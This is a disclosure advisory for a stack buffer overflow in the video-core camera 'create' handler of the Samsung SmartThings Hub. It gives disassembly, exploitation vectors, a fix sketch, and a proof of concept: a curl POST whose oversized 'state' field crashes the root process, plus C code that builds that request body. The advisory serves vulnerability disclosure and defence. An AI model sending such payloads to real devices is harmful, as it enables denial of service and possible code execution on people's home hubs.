### Summary
An exploitable buffer overflow vulnerability exists in the camera
"create" feature of the `video-core` HTTP server of the Samsung SmartThings
Hub. The `video-core` process incorrectly extracts the "state" field
from a user-controlled JSON payload, leading to a buffer overflow on the
stack. An attacker can send an HTTP request to trigger this
vulnerability.
### Tested Versions
Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17
### Product URLs
[https://www.smartthings.com/products/smartthings-hub](https://www.smartthings.com/products/smartthings-hub)
### CVSSv3 Score
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
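The 8.5 score can be reproduced from the vector with the CVSS v3.0 base-score equations. The following is a minimal sketch in C and is not part of the original analysis. The function names are illustrative, and the weights are assumed to be the ones published in the CVSS v3.0 specification for AV:N, AC:H, PR:L (with scope changed), UI:N and C/I/A:H.

```c
#include <assert.h>

/* Metric weights assumed from the CVSS v3.0 specification. */
#define AV_NETWORK      0.85
#define AC_HIGH         0.44
#define PR_LOW_CHANGED  0.68  /* PR:L weight when scope is changed */
#define UI_NONE         0.85
#define CIA_HIGH        0.56

/* x raised to a small non-negative integer power (avoids linking libm). */
double ipow(double x, int n)
{
    double r = 1.0;
    while (n-- > 0)
        r *= x;
    return r;
}

/* CVSS "Roundup": smallest one-decimal value >= x, returned in tenths
 * (85 means 8.5). */
int roundup_tenths(double x)
{
    int t = (int)(x * 10.0);
    return ((double)t < x * 10.0) ? t + 1 : t;
}

/* Base score, in tenths, for AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H. */
int cvss30_base_tenths(void)
{
    double exploitability =
        8.22 * AV_NETWORK * AC_HIGH * PR_LOW_CHANGED * UI_NONE;
    double isc_base = 1.0 - ipow(1.0 - CIA_HIGH, 3);
    /* Impact sub-score formula for the "scope changed" case. */
    double impact =
        7.52 * (isc_base - 0.029) - 3.25 * ipow(isc_base - 0.02, 15);
    double score;

    assert(impact > 0.0);  /* the base score is defined as 0 otherwise */
    score = 1.08 * (impact + exploitability);
    if (score > 10.0)
        score = 10.0;
    return roundup_tenths(score);
}
```

With these inputs the exploitability sub-score is roughly 1.78 and the impact sub-score roughly 6.05, so 1.08 × 7.82 ≈ 8.45, which rounds up to 8.5.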
### CWE
CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer
Overflow')
### Details
Samsung produces a series of devices aimed at controlling and monitoring
a home, such as wall switches, LED bulbs, thermostats and cameras. One
of those is the Samsung SmartThings Hub, a central controller which
allows an end user to use their smartphone to connect to their house
remotely and operate other devices through it. The hub board uses
several systems-on-chip (SoCs). The firmware in question is executed by an
i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A
architecture.
The firmware is Linux-based and runs a series of daemons that interface
with nearby devices via Ethernet, ZigBee, Z-Wave and Bluetooth
protocols. Additionally, the `hubCore` process is responsible for
communicating with the remote SmartThings servers via a persistent TLS
connection. These servers act as a bridge that allows for secure
communication between the smartphone application and the hub. End users
can simply install the SmartThings mobile application on their
smartphone to control the hub remotely.
One of the features of the hub is that it connects to smart cameras,
configures them and accesses their livestreams. For testing, we set up
the Samsung SmartCam SNH-V6414BN on the hub. Once this is done, the
livestream can be displayed by the smartphone application by connecting
either to the remote SmartThings servers or directly to the camera, if
both are on the same subnetwork.
Inside the hub, the livestream is handled by the `video-core` process,
which uses `ffmpeg` to connect via RTSP to the smart camera on the same
local network and, at the same time, provides a streamable link for the
smartphone application.
The remote SmartThings servers can communicate with
the `video-core` process by sending messages over the persistent TLS
connection established by the `hubCore` process. These messages can
encapsulate an HTTP request, which `hubCore` relays directly to the
HTTP server exposed by `video-core`. The HTTP server listens on port
3000, bound to the localhost address, so a local connection is needed to
perform this request.
We identified a vulnerable request that can be exploited to achieve code
execution in the `video-core` process, which runs as root. By
sending a POST request to the "/cameras" path, it's possible to add a
new camera to the hub.
Such a request is handled by the function `sub_48A14`:
.text:00048A14 sub_48A14
.text:00048A14
.text:00048A14 dest = -0x4364
.text:00048A14 var_4300= -0x4300
.text:00048A14 var_4200= -0x4200
.text:00048A14 var_4000= -0x4000
.text:00048A14 var_3E80= -0x3E80
.text:00048A14 var_3C80= -0x3C80
.text:00048A14 var_3A80= -0x3A80
.text:00048A14 var_2040= -0x2040
.text:00048A14 arg_0 = 4
.text:00048A14 buffer = 8
.text:00048A14 arg_8 = 0xC
.text:00048A14 arg_10 = 0x14
.text:00048A14
.text:00048A14 000 MOV R12, #:lower16:dword_C4DCC
.text:00048A18 000 STMFD SP!, {R4-R11,LR}
.text:00048A1C 024 MOVT R12, #:upper16:dword_C4DCC
.text:00048A20 024 ADD R11, SP, #0x20
.text:00048A24 024 SUB SP, SP, #0x4300
.text:00048A28 4324 MOV R5, R3
.text:00048A2C 4324 SUB SP, SP, #0x54
...
.text:00048A8C 4378 BL http_required_json_parameters ; [1]
.text:00048A90 4378 MOV R5, R0
.text:00048A94 4378 SUB R0, R11, #-var_4000
.text:00048A98 4378 MOV R1, R6
.text:00048A9C 4378 MOV R2, #0x2044
.text:00048AA0 4378 SUB R0, R0, #0xAC
.text:00048AA4 4378 BL memset
.text:00048AA8 4378 SUB R0, R11, #-var_4000
.text:00048AAC 4378 SUB R0, R0, #0xAC
.text:00048AB0 4378 BL clear_buffers
.text:00048AB4 4378 CMP R5, R6
.text:00048AB8 4378 BNE loc_48ADC
...
.text:00048ADC loc_48ADC
.text:00048ADC 000 MOV R0, R4
.text:00048AE0 000 BL json_tokener_parse ; [2]
.text:00048AE4 000 SUBS R5, R0, #0
.text:00048AE8 000 BEQ loc_48BEC
.text:00048AEC 000 SUB R0, R11, #-var_4000
.text:00048AF0 000 MOV R1, R5
.text:00048AF4 000 SUB R0, R0, #0xAC
.text:00048AF8 000 BL sub_48438 ; [3]
Note that the binary embeds the ["json-c"
library](https://github.com/json-c/json-c) that is used to manage JSON
objects.
The function initially calls `http_required_json_parameters` at [1] to
verify that all the required parameters are specified in the JSON
request: `cameraId`, `locationId`, `dni` and `url`. At [2], the function
parses the JSON payload received in the request using
`json_tokener_parse`, which returns a `json_object`. It then calls
`sub_48438` at [3], passing a pointer to a local stack buffer and the
`json_object` as parameters.
.text:00048438 sub_48438
.text:00048438
.text:00048438 000 STMFD SP!, {R4-R9,LR}
.text:0004843C 01C MOV R4, R1
.text:00048440 01C SUB SP, SP, #0x244
.text:00048444 260 MOV R1, #:lower16:aCameraid_1 ; "cameraId"
.text:00048448 260 MOV R6, R0
.text:0004844C 260 ADD R2, SP, #0x260+value
.text:00048450 260 MOV R0, R4 ; jso
.text:00048454 260 MOVT R1, #:upper16:aCameraid_1 ; "cameraId"
.text:00048458 260 BL json_object_object_get_ex ; [4]
.text:0004845C 260 CMP R0, #0
.text:00048460 260 BNE loc_48488
...
.text:000485AC 260 MOV R1, #:lower16:aLocationid_0 ; "locationId"
.text:000485B0 260 STR R7, [R6,#4]
.text:000485B4 260 MOVT R1, #:upper16:aLocationid_0 ; "locationId"
.text:000485B8 260 MOV R0, R4 ; jso
.text:000485BC 260 ADD R2, SP, #0x260+value
.text:000485C0 260 BL json_object_object_get_ex ; [4]
.text:000485C4 260 CMP R0, #0
.text:000485C8 260 BNE loc_48638
...
.text:000486FC 260 MOV R1, #:lower16:aDni ; "dni"
.text:00048700 260 STR R7, [R6,#0x208]
.text:00048704 260 MOVT R1, #:upper16:aDni ; "dni"
.text:00048708 260 MOV R0, R4 ; jso
.text:0004870C 260 ADD R2, SP, #0x260+value
.text:00048710 260 BL json_object_object_get_ex ; [4]
.text:00048714 260 CMP R0, #0
.text:00048718 260 BNE loc_48790
...
.text:00048850 260 MOV R1, #:lower16:aUrl_0 ; "url"
.text:00048854 260 STR R7, [R6,#0x40C]
.text:00048858 260 MOVT R1, #:upper16:aUrl_0 ; "url"
.text:0004885C 260 MOV R0, R4 ; jso
.text:00048860 260 ADD R2, SP, #0x260+value
.text:00048864 260 BL json_object_object_get_ex ; [4]
.text:00048868 260 CMP R0, #0
.text:0004886C 260 BNE loc_488DC
...
.text:00048938 260 MOV R1, #:lower16:aState ; "state"
.text:0004893C 260 STR R0, [R6,#0xE24]
.text:00048940 260 MOVT R1, #:upper16:aState ; "state"
.text:00048944 260 STRH R3, [R12,#0xC]
.text:00048948 260 MOV R0, R4 ; jso
.text:0004894C 260 STRB LR, [R6,#0xE2E]
.text:00048950 260 BL json_object_object_get_ex ; [4]
.text:00048954 260 CMP R0, #0
.text:00048958 260 BNE loc_489E0
...
.text:000489E0 loc_489E0
.text:000489E0 260 LDR R0, [SP,#0x260+value]
.text:000489E4 260 BL json_object_to_json_string ; [5]
.text:000489E8 260 MOV R7, R0
.text:000489EC 260 BL strlen ; [6]
.text:000489F0 260 MOV R4, R0
.text:000489F4 260 ADD R0, R6, #0x810
.text:000489F8 260 MOV R1, R7
.text:000489FC 260 MOV R2, R4
.text:00048A00 260 ADD R0, R0, #8
.text:00048A04 260 BL memcpy ; [7]
The purpose of this function is to extract each parameter and store it
in the buffer passed as an argument. Each parameter is extracted using the
following sequence:
- Call `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] to extract a parameter by key name.
- Copy the parameter value into a buffer on the stack, using `strlen` [6] and `memcpy` [7].
Additionally, before calling `memcpy`, the parameters "cameraId",
"locationId" and "dni" are verified using regular expressions, and the
"url" parameter is simply truncated to a maximum length of 0x200.
However, the "state" parameter is not sanitized in any way. In fact, we
can see that the `length` argument of the `memcpy` call [7] is taken
directly from the `strlen` [6] output of the source string itself. At a
high level, this is equivalent to:
memcpy(stack_buffer, state, strlen(state));
Since `state` is controlled by the user, nothing restricts the length of
the copy operation, which allows overflowing the stack buffer and
potentially leads to arbitrary code execution.
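For contrast, a bounded version of the copy might look like the following sketch. It is illustrative only and is not the vendor's patch: the helper name `copy_field_bounded` and the `dst_size` parameter are hypothetical, and this advisory does not state the actual size of the destination buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Copy a NUL-terminated, attacker-controlled string into a fixed-size
 * buffer. Returns 0 on success, or -1 (leaving dst untouched) when the
 * string plus its terminator would not fit in dst_size bytes.
 */
int copy_field_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    assert(dst != NULL && src != NULL);

    len = strlen(src);
    if (len >= dst_size)   /* no room for len bytes plus the NUL */
        return -1;

    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}
```

A caller would treat a -1 return as a malformed request and reject it, which is similar in spirit to the 0x200-byte limit the handler already applies to "url".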
We identified two different vectors that allow for exploiting this
vulnerability:
- Anyone able to impersonate the remote SmartThings servers can send
arbitrary HTTP requests to `hubCore` that would be relayed without
modification to the vulnerable `video-core` process.
- SmartThings SmartApps allow for creating custom applications that
can be either published directly into the device itself, or on the
public marketplace. A SmartApp is executed inside the `hubCore`
process, and is allowed to make any localhost connection. It is thus
possible for a SmartApp to send arbitrary HTTP requests directly to
the vulnerable `video-core` process.
A third vector might exist, but we decided not to test it to avoid
damaging any live infrastructure. This would consist of sending a
malicious request from the SmartThings mobile application to the remote
SmartThings servers. In turn, depending on the remote APIs available,
the servers could relay the malicious payload back to the device via the
persistent TLS connection. To use this vector, an attacker would need to
possess a valid OAuth bearer token, or the corresponding username and
password pair needed to obtain one.
### Exploit Proof of Concept
The following proof of concept shows how to crash the `video-core`
process:
$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'
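The request body produced by the Perl one-liner can also be built programmatically. The sketch below uses only the field values shown in the command above. The helper name `build_poc_body` is hypothetical, and sending the body over HTTP is deliberately left out.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Write the proof-of-concept JSON body into out, using state_len 'A'
 * characters as the "state" value. Returns the body length (excluding
 * the terminating NUL), or -1 if out_size is too small.
 */
int build_poc_body(char *out, size_t out_size, size_t state_len)
{
    static const char prefix[] =
        "{\"cameraId\":\"00000000-0000-0000-0000-000000000000\","
        "\"locationId\":\"00000000-0000-0000-0000-000000000000\","
        "\"dni\":\"000000000000\",\"url\":\"x\",\"state\":\"";
    static const char suffix[] = "\"}";
    size_t prefix_len = sizeof prefix - 1;
    size_t suffix_len = sizeof suffix - 1;
    size_t total = prefix_len + state_len + suffix_len;

    assert(out != NULL);
    if (total + 1 > out_size)   /* +1 for the terminating NUL */
        return -1;

    memcpy(out, prefix, prefix_len);
    memset(out + prefix_len, 'A', state_len);
    /* Copy the suffix together with its terminating NUL. */
    memcpy(out + prefix_len + state_len, suffix, suffix_len + 1);
    return (int)total;
}
```

Calling `build_poc_body(buf, sizeof buf, 700)` with a sufficiently large `buf` yields the same body as the `curl` command, with 700 `A` characters in the "state" field.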
### Timeline
* 2018-04-16 - Vendor Disclosure
* 2018-05-23 - Discussion with vendor/review of timeline for disclosure
* 2018-07-17 - Vendor patched
* 2018-07-26 - Public Release